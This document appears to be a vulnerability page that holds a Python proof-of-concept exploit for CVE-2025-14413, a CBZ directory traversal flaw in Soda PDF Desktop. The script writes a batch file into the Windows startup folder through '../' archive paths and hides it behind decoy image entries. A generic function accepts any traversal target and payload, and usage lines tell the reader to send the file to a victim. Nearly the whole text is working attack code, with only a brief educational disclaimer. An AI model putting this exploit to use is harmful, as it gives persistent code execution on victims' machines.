CVE-2025-14413: Soda PDF Desktop CBZ文件解析目录遍历远程代码执行漏洞

#!/usr/bin/env python3 # CVE-2025-14413 PoC - Soda PDF Desktop CBZ Directory Traversal RCE # Author: Security Researcher # Note: This PoC is for educational and authorized testing purposes only import zipfile import os def create_malicious_cbz(): """ Create a malicious CBZ file with directory traversal payload Targets Windows startup folder for persistence """ # Path traversal sequence to escape sandbox and write to startup folder traversal_path = "../../../../../../ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/" malicious_filename = "evil.bat" # Payload: Creates a reverse shell connection or executes arbitrary command malicious_content = b"""@echo off REM Malicious payload for CVE-2025-14413 REM This demonstrates the directory traversal vulnerability start calc.exe """ # Alternative payload targeting different locations # Can also target: %APPDATA%, %TEMP%, application directories output_file = "CVE-2025-14413_poc.cbz" with zipfile.ZipFile(output_file, 'w') as cbz: # Create entry with directory traversal path # Soda PDF will write this file outside intended directory full_path = traversal_path + malicious_filename cbz.writestr(full_path, malicious_content) # Add benign content to avoid suspicion cbz.writestr("comic/page1.jpg", b"fake_image_data") cbz.writestr("comic/page2.jpg", b"fake_image_data") print(f"[+] Created malicious CBZ file: {output_file}") print(f"[+] Payload will attempt to write to startup folder") return output_file def create_exploit_cbz(target_path, payload_filename, payload_content): """ Generate exploit CBZ with custom traversal target Args: target_path: Directory traversal path (e.g., ../../AppData/...) payload_filename: Name of file to create on target system payload_content: Content to write to the file """ exploit_file = "exploit.cbz" with zipfile.ZipFile(exploit_file, 'w') as cbz: malicious_entry = target_path + payload_filename cbz.writestr(malicious_entry, payload_content) print(f"[+] Exploit CBZ created: {exploit_file}") return exploit_file if __name__ == "__main__": print("=" * 60) print("CVE-2025-14413 - Soda PDF Desktop CBZ Directory Traversal") print("=" * 60) create_malicious_cbz() print("\n[*] Usage: Send the generated .cbz file to victim") print("[*] When victim opens file in Soda PDF Desktop, payload executes")